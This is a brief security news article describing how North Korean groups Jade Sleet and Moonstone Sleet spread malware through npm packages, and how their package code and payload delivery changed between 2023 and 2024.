Despite efforts to expose supply chain attacks through the open-source npm registry by North Korean actors like Jade Sleet, new malicious packages continued to appear in late 2023 and early 2024.
Initially thought to be a continuation of Jade Sleet’s campaign, further investigation revealed a new threat actor, Moonstone Sleet.
Moonstone Sleet employs similar tactics, distributing malware through compromised npm packages on the public registry, endangering a large pool of developers, and highlighting the persistent threat actors like Moonstone Sleet and Jade Sleet pose to the open-source software supply chain.
Microsoft identified a new North Korean threat actor, Moonstone Sleet, that uses similar tactics (TTPs) to other North Korean actors for financial gain and espionage.
Moonstone Sleet leverages malicious npm packages to target companies, which resemble previously identified ones distributed through freelancing platforms and LinkedIn.
Notably, it also uploads malicious packages to the public npm registry, potentially infecting unsuspecting developers through a wider reach.
Differences between Code Style and Structure
An analysis of malicious npm packages reveals a shift in coding practices, where packages linked to Jade Sleet, discovered in spring and early summer 2023, differ in style and structure from those associated with the Moonstone Sleet group, active in late 2023 and early 2024.
It suggests distinct strategies employed by these groups when targeting the open-source software supply chain. By examining these code variations, we can gain valuable insights into the evolving tactics used to compromise software through compromised packages.
In order to avoid detection, Jade Sleet, a threat actor with ties to North Korea, distributed malicious code through npm packages in summer 2023.
The first package created a directory on the victim’s machine and downloaded updates from a remote server, storing them within the directory, which prepared the system for the second package, which would deliver the final malicious payload.
An attacker executes a two-part package attack, as the first package generates a token and stores it in a file, while the second package retrieves this token, makes a request to a URL with the token as a parameter, and downloads the response, likely containing malicious code.
According to Checkmarx, the second package executes the downloaded content directly as a Node.js script, enabling full malicious functionality.
Moonstone Sleet, a hacking group, changed their npm package attack strategy in mid-2024. Earlier packages used a single, streamlined approach to deliver the payload upon installation, which only targeted Windows.
The packages contained malicious code encoded within strings and only executed on Windows machines, but in the second quarter of 2024, their packages became more complex, using obfuscation and targeting both Windows and Linux systems.
The new payload flow involves downloading a file, decrypting it, renaming it, and executing it before deleting temporary files and replacing the malicious code with a clean version.
Also Read:
